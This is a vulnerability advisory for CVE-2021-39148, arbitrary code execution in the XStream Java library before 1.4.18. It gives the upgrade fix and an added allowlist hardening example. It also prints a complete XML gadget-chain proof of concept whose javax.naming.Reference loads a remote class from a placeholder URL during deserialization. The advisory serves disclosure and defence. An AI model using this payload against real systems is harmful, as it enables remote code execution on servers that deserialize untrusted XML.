Arbitrary Code Execution Affecting com.thoughtworks.xstream:xstream package, versions [,1.4.18)
Snyk ID SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1569181
- published 24 Aug 2021
- disclosed 24 Aug 2021
- credit wh1t3p1g
Introduced: 24 Aug 2021
CVE-2021-39148
How to fix?
Upgrade com.thoughtworks.xstream:xstream to version 1.4.18 or higher.
Overview
com.thoughtworks.xstream:xstream is a simple library to serialize objects to XML and back again.
Affected versions of this package are vulnerable to Arbitrary Code Execution. The vulnerability may allow a remote attacker to load and execute arbitrary code from a remote host solely by manipulating the processed input stream: the PoC below builds a gadget chain out of JDK classes that ends in a javax.naming.Reference whose classFactoryLocation points at an attacker-controlled URL, so the class named in classFactory is fetched and instantiated from there during deserialization. Users who followed the recommendation to set up XStream's security framework with a whitelist limited to the minimal required types are not affected, because the first class in the chain that is not on the whitelist is rejected before any of it is instantiated. XStream 1.4.18 no longer uses a blacklist by default, since a blacklist cannot be secured for general-purpose use.
PoC
<sorted-set>
<javax.naming.ldap.Rdn_-RdnEntry>
<type>ysomap</type>
<value class='com.sun.xml.internal.ws.api.message.Packet' serialization='custom'>
<message class='com.sun.xml.internal.ws.message.saaj.SAAJMessage'>
<parsedMessage>true</parsedMessage>
<soapVersion>SOAP_11</soapVersion>
<bodyParts/>
<sm class='com.sun.xml.internal.messaging.saaj.soap.ver1_1.Message1_1Impl'>
<attachmentsInitialized>false</attachmentsInitialized>
<multiPart class='com.sun.xml.internal.messaging.saaj.packaging.mime.internet.MimePullMultipart'>
<soapPart/>
<mm>
<it class='com.sun.org.apache.xml.internal.security.keys.storage.implementations.KeyStoreResolver$KeyStoreIterator'>
<aliases class='com.sun.jndi.toolkit.dir.ContextEnumerator'>
<children class='javax.naming.directory.BasicAttribute$ValuesEnumImpl'>
<list class='com.sun.xml.internal.dtdparser.SimpleHashtable'>
<current>
<hash>1</hash>
<key class='javax.naming.Binding'>
<name>ysomap</name>
<isRel>false</isRel>
<boundObj class='com.sun.jndi.ldap.LdapReferralContext'>
<refCtx class='javax.naming.spi.ContinuationDirContext'>
<cpe>
<stackTrace/>
<suppressedExceptions class='java.util.Collections$UnmodifiableRandomAccessList' resolves-to='java.util.Collections$UnmodifiableList'>
<c class='list'/>
<list reference='../c'/>
</suppressedExceptions>
<resolvedObj class='javax.naming.Reference'>
<className>EvilObj</className>
<addrs/>
<classFactory>EvilObj</classFactory>
<classFactoryLocation>http://127.0.0.1:1099/</classFactoryLocation>
</resolvedObj>
<altName class='javax.naming.CompoundName' serialization='custom'>
<javax.naming.CompoundName>
<properties/>
<int>1</int>
<string>ysomap</string>
</javax.naming.CompoundName>
</altName>
</cpe>
</refCtx>
<skipThisReferral>false</skipThisReferral>
<hopCount>0</hopCount>
</boundObj>
</key>
</current>
<currentBucket>0</currentBucket>
<count>0</count>
<threshold>0</threshold>
</list>
</children>
<currentReturned>true</currentReturned>
<currentChildExpanded>false</currentChildExpanded>
<rootProcessed>true</rootProcessed>
<scope>2</scope>
</aliases>
</it>
</mm>
</multiPart>
</sm>
</message>
</value>
</javax.naming.ldap.Rdn_-RdnEntry>
<javax.naming.ldap.Rdn_-RdnEntry>
<type>ysomap</type>
<value class='com.sun.org.apache.xpath.internal.objects.XString'>
<m__obj class='string'>test</m__obj>
</value>
</javax.naming.ldap.Rdn_-RdnEntry>
</sorted-set>
import com.thoughtworks.xstream.XStream;
// Vulnerable usage on versions before 1.4.18: the default instance relies on the blacklist only, no whitelist is installed.
XStream xstream = new XStream();
xstream.fromXML(xml); // xml holds the payload above; deserializing it triggers the chain
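The snippet above is the vulnerable configuration. The following is an added example, not code from the advisory or from the XStream project, showing the whitelist setup the Overview refers to next to it: permissions are cleared with NoTypePermission.NONE and only the application's own types are allowed back in, so a document whose root is the PoC's sorted-set / Rdn$RdnEntry pair is refused at the first foreign class instead of walking the chain. The Invoice class, the "invoice" alias, the BENIGN document and the PROBE document are all constructed for this example; the PROBE only reuses the outer element names of the PoC and carries no gadget chain.

```java
import com.thoughtworks.xstream.XStream;
import com.thoughtworks.xstream.security.ForbiddenClassException;
import com.thoughtworks.xstream.security.NoTypePermission;
import com.thoughtworks.xstream.security.NullPermission;
import com.thoughtworks.xstream.security.PrimitiveTypePermission;

public class XStreamAllowlistDemo {

    // Hypothetical application type used for the round-trip (not from the advisory).
    public static class Invoice {
        String customer;
        int amount;
    }

    // Hardened configuration: deny everything first, then allow only what the
    // application actually serializes. This is correct on 1.4.17 and earlier
    // (where the default is blacklist-only) and on 1.4.18+ (where the default
    // already denies unknown types) alike.
    static XStream hardenedXStream() {
        XStream xstream = new XStream();
        xstream.addPermission(NoTypePermission.NONE);               // clear permissions, deny-all baseline
        xstream.addPermission(NullPermission.NULL);                 // allow <null/>
        xstream.addPermission(PrimitiveTypePermission.PRIMITIVES);  // allow int, boolean, ... and wrappers
        xstream.allowTypes(new Class[] { String.class, Invoice.class }); // explicit allowlist
        xstream.alias("invoice", Invoice.class);
        return xstream;
    }

    // Vulnerable configuration on versions before 1.4.18: defaults only, so the
    // blacklist is the only thing between the input stream and every class on the classpath.
    static XStream defaultXStream() {
        return new XStream();
    }

    // Constructed benign document for the allowed type.
    static final String BENIGN =
        "<invoice><customer>ACME</customer><amount>42</amount></invoice>";

    // Constructed probe: same outer element types as the advisory's PoC
    // (sorted-set -> java.util.TreeSet, then javax.naming.ldap.Rdn$RdnEntry),
    // without the rest of the chain. Enough to show where the allowlist stops it.
    static final String PROBE =
        "<sorted-set><javax.naming.ldap.Rdn_-RdnEntry><type>x</type>"
      + "</javax.naming.ldap.Rdn_-RdnEntry></sorted-set>";

    public static void main(String[] args) {
        XStream safe = hardenedXStream();

        // Allowed type round-trips normally.
        Invoice inv = (Invoice) safe.fromXML(BENIGN);
        System.out.println("benign round-trip: " + inv.customer + " " + inv.amount);

        // The probe is refused at the root element: java.util.TreeSet is not on the
        // allowlist, so no object of the chain is ever instantiated.
        try {
            safe.fromXML(PROBE);
            System.out.println("UNEXPECTED: probe was accepted");
        } catch (ForbiddenClassException e) {
            System.out.println("rejected by allowlist: " + e.getMessage());
        }
    }
}
```

Run with xstream on the classpath (on JDK 9+ the reflection provider may additionally need --add-opens for java.base internals; that is unrelated to the allowlist). Whichever permission is added last is consulted first, so the order above (NONE, then NULL and PRIMITIVES, then allowTypes) is what makes the deny-all baseline take effect without masking the later allows.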